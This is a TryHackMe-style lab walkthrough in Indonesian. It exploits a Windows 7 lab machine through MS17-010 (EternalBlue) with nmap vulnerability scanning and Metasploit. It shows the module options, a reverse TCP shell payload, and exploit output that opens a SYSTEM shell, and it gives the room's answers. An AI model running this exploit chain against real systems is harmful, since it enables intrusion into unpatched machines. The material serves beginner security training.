Terapkan & retas ke mesin Windows, memanfaatkan masalah kesalahan konfigurasi umum.
Pindai dan pelajari apa yang rentan terhadap eksploitasi mesin ini. Harap perhatikan bahwa mesin ini tidak merespons ping (ICMP) dan mungkin memerlukan beberapa menit untuk boot. Ruangan ini tidak dimaksudkan untuk menjadi CTF boot2root, melainkan, ini adalah seri pendidikan untuk pemula yang lengkap. Para profesional kemungkinan besar akan mendapatkan sangat sedikit dari ruangan ini di luar praktik dasar karena proses di sini dimaksudkan untuk berfokus pada pemula.
Pindai mesin. (Jika Anda tidak yakin bagaimana menangani ini, saya sarankan untuk memeriksa ruang Nmap)
Berapa banyak port terbuka dengan nomor port di bawah 1000?
Lakukan scanning port dan lihat ada berapa banya port yang terbuka di bawah 1000.
┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sV -vv --script vuln 10.10.217.244
[sudo] password for cyber:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 13:21 WIT
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
Initiating Ping Scan at 13:21
Scanning 10.10.217.244 [4 ports]
Completed Ping Scan at 13:21, 0.48s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:21
Completed Parallel DNS resolution of 1 host. at 13:22, 13.00s elapsed
Initiating SYN Stealth Scan at 13:22
Scanning 10.10.217.244 [1000 ports]
Discovered open port 445/tcp on 10.10.217.244
Discovered open port 3389/tcp on 10.10.217.244
Discovered open port 139/tcp on 10.10.217.244
Discovered open port 135/tcp on 10.10.217.244
Discovered open port 49153/tcp on 10.10.217.244
Increasing send delay for 10.10.217.244 from 0 to 5 due to 52 out of 171 dropped probes since last increase.
Discovered open port 49152/tcp on 10.10.217.244
Discovered open port 49160/tcp on 10.10.217.244
Discovered open port 49158/tcp on 10.10.217.244
Discovered open port 49154/tcp on 10.10.217.244
Increasing send delay for 10.10.217.244 from 5 to 10 due to max_successful_tryno increase to 4
Completed SYN Stealth Scan at 13:22, 47.00s elapsed (1000 total ports)
Initiating Service scan at 13:22
Scanning 9 services on 10.10.217.244
Service scan Timing: About 55.56% done; ETC: 13:24 (0:00:47 remaining)
Completed Service scan at 13:23, 65.16s elapsed (9 services on 1 host)
NSE: Script scanning 10.10.217.244.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:23
NSE Timing: About 99.91% done; ETC: 13:24 (0:00:00 remaining)
Completed NSE at 13:24, 31.93s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:24
NSE: [ssl-ccs-injection 10.10.217.244:3389] No response from server: ERROR
Completed NSE at 13:24, 10.30s elapsed
Nmap scan report for 10.10.217.244
Host is up, received echo-reply ttl 127 (0.30s latency).
Scanned at 2021-03-01 13:21:47 WIT for 168s
Not shown: 991 closed ports
Reason: 991 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49160/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.34 seconds
Raw packets sent: 1681 (73.940KB) | Rcvd: 1103 (44.144KB)
Dan terlihat berdasarkan scanning di atas port yang terbuka di bawah 1000 adalah port 135, 139, 445.
jumlah port yang terbuka di bawah 1000 adalah 3
Answare = 3
Mesin ini rentan terhadap apa? (Answer berupa: ms ?? - ???, ex: ms08-067)
Berdasarkan scanning di atas kita meliha bahwa yang rentan. sesuai dengan contoh ms08-067
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
Answare = ms17-010
Eksploitasi mesin dan dapatkan pijakan.
Start Metasploit
Temukan kode eksploitasi yang akan kita jalankan melawan mesin. Apa jalur lengkap kode? (Contoh: exploit / ........)
Buka metasploit dan kita cari modul yang dapat mengeksploitasu mesin ms17-010 yang rentan.
┌─[cyber@cyber]─[~]
└──╼ $sudo msfconsole
[sudo] password for cyber:
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit!
;@'. __*__,." |--- \_____________/
'(.,...."/
=[ metasploit v6.0.16-dev ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE true
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
Berdasarkan pencarian kita telah menemukan modul untuk mengekploitas mesin ms17-010 tersebut.
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows
Answare = exploit/windows/smb/ms17_010_eternalblue
Tunjukkan opsi dan setel satu nilai yang diperlukan. Apa nama nilai ini? (Semua huruf besar untuk pengiriman)
jalankan perintah untuk melihat target
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
jalankan perintah untuk melihat opsi
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.14 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
jalankan perintah set ip target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.217.244
RHOSTS => 10.10.217.244
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.217.244 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.14 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Answare = RHOSTS
Biasanya akan baik-baik saja untuk menjalankan exploit ini sebagaimana adanya; Namun, demi pembelajaran, Anda harus melakukan satu hal lagi sebelum memanfaatkan target. Masukkan perintah berikut dan tekan enter:
set payload windows/x64/shell/reverse_tcp
jalankan perintah berikut :
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.217.244 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.14 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Set lhost untuk reverst handler dengan ip tunnel yang di jalan di terminal terhubung dengan openvpn tryhackme
┌─[cyber@cyber]─[~]
└──╼ $ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.9.169.148 netmask 255.255.0.0 destination 10.9.169.148
inet6 fe80::4bd4:3af2:b172:9b5 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 2174 bytes 125662 (122.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3222 bytes 676629 (660.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
jalankan perintah berikut:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.9.169.148
lhost => 10.9.169.148
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.217.244 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.169.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Setelah selesai, jalankan exploit!
Jalankan Exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.9.169.148:4444
[*] 10.10.217.244:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.217.244:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.217.244:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.217.244:445 - Connecting to target for exploitation.
[+] 10.10.217.244:445 - Connection established for exploitation.
[+] 10.10.217.244:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.217.244:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.217.244:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.217.244:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.217.244:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.217.244:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.217.244:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.217.244:445 - Sending all but last fragment of exploit packet
[*] 10.10.217.244:445 - Starting non-paged pool grooming
[+] 10.10.217.244:445 - Sending SMBv2 buffers
[+] 10.10.217.244:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.217.244:445 - Sending final SMBv2 buffers.
[*] 10.10.217.244:445 - Sending last fragment of exploit packet!
[*] 10.10.217.244:445 - Receiving response from exploit packet
[+] 10.10.217.244:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.217.244:445 - Sending egg to corrupted connection.
[*] 10.10.217.244:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.217.244
[*] Command shell session 2 opened (10.9.169.148:4444 -> 10.10.217.244:49256) at 2021-03-01 14:27:47 +0900
[+] 10.10.217.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.217.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.217.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>
kita telah menembus system target dan mengambil alih system.
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
Tingkatkan hak istimewa, pelajari cara mengupgrade shell di metasploit.
Jika Anda belum melakukannya, buat latar belakang shell yang diperoleh sebelumnya (CTRL + Z). Cari tahu secara online cara mengonversi shell menjadi shell meterpreter di metasploit. Apa nama modul posting yang akan kita gunakan? (Jalur yang tepat, mirip dengan eksploitasi yang kami pilih sebelumnya)